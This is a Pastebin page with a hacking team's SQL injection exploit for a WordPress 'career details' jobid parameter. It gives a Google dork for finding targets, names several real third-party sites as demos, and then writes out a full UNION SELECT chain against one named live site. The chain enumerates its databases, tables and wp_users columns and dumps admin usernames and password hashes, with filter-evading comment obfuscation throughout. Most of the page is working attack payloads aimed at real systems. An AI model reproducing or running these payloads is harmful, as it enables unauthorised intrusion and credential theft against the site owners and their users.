Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Wordpress All Version career details Sql Injection Vulnerability
- #######################################################
- #
- # [+] Exploit Title: Wordpress All Version career details Sql Injection Vulnerability
- # [+] Google Dork: inurl:/career-details/?jobid=
- # [+] Date: 10/10/2013
- # [+] Exploit Author: Iranian_Dark_Coders_Team
- # [+] Discovered By: Black.Hack3r
- # [+] Version: All Version
- # [+] Security Risk: High
- # [+] Platforms: php
- # [+] Tested on: Windows 7
- #
- #######################################################
- #
- # [+] VULNERABILITY:
- #
- #Wordpress All Version career details Sql Injection Vulnerability
- #
- #######################################################
- #
- # [+] Exploit:
- #
- #http://localhost/[path]/career-details/?jobid=3'[Sql Injection]
- #
- #######################################################
- #
- # [+] Proof:
- #
- #http://localhost/[path]/career-details/?jobid=3+order+by+4-- No Error
- #http://localhost/[path]/career-details/?jobid=3+order+by+5-- Error
- #
- #######################################################
- #
- # [+] Demo site:
- #
- #http://www.sheensol.com/career-details?jobid=1
- #http://www.stuxbot.co.uk/career-details/?jobid=3
- #http://www.op3global.com/career-details/?jobid=3
- #http://p2pdevs.com/career-details/?jobid=2
- #http://37.58.83.234/~geerling/en/career-details/?jobid=1
- #
- #######################################################
- #
- # [+] Discovered By : Black.Hack3r
- # [+] We Are : M.R.S.CO,Black.Hack3r,N3O
- # [+] SpTnx : Mr.Cicili,Sec4ever,D$@d_M@n,HOt0N,KurD_HaCK3R,MR.0x41,M4H4N,Security,@3is And All Members In wWw.IDC-TeaM.NeT
- # [+] Home : http://wWw.IDC-TeaM.NeT
- #
- #######################################################
- http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,2,3,4--
- all databases :------------------------------------------------------------------------------------------------------------------------------------
- http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(SCHEMA_NAME)*/)),3,4 /*!12345from*/ /*!12345INFORMATION_SCHEMa.SCHEMATA*/--
- ------------------------------------------------------------------------------------------------------------------------------------
- currentdatabase
- :--------------------------------------------------------------------------------------------------
- http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,database(),3,4 /*!12345from*/ wp_users--
- ------------------------------------------------------------------------------------------------------------------------------------
- tables for current database
- :------------------------------------------------------------------------------------------
- http://www.bolttechmannings.com/career-details/?jobid=19+/*!12345UNION*/+/*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(table_name)*/)),3,4 /*!12345from*/ /*!12345information_schema.tables*/ /*!12345where*/ /*!12345table_schema*/ =database()--
- ---------------------------------------------------------------------------------------------------
- columns in table wp_users
- : ---------------------------------------------------------------------------------
- http://www.bolttechmannings.com/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(COLUMN_NAME)*/)),3,4 /*!12345from*/ /*!12345information_schema.columns*/ /*!12345where*/ /*!12345table_name*/ =CHAR(119, 112, 95, 117, 115, 101, 114, 115)--
- -----------------------------------------------------------------------------------------------------------
- admin user & pass
- : --------------------------------------------------------------------------------------------
- http://www.bolttechmannings.com/career-details/?jobid=19 /*!12345UNION*/ /*!12345SELECT*/ 1,unhex(hex(/*!12345GrOUp_COnCaT(ID,0x3a,user_login,0x3a,user_pass)*/)),3,4 /*!12345from*/ wp_users--
- -------------------------------------------------
- Note: The exploit-- http://www.mondounix.com/wordpress-easy-career-openings-sql-injection/
- we converted to decimal numbers
- for this you can use this site:
- http://www.branah.com/ascii-converter
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement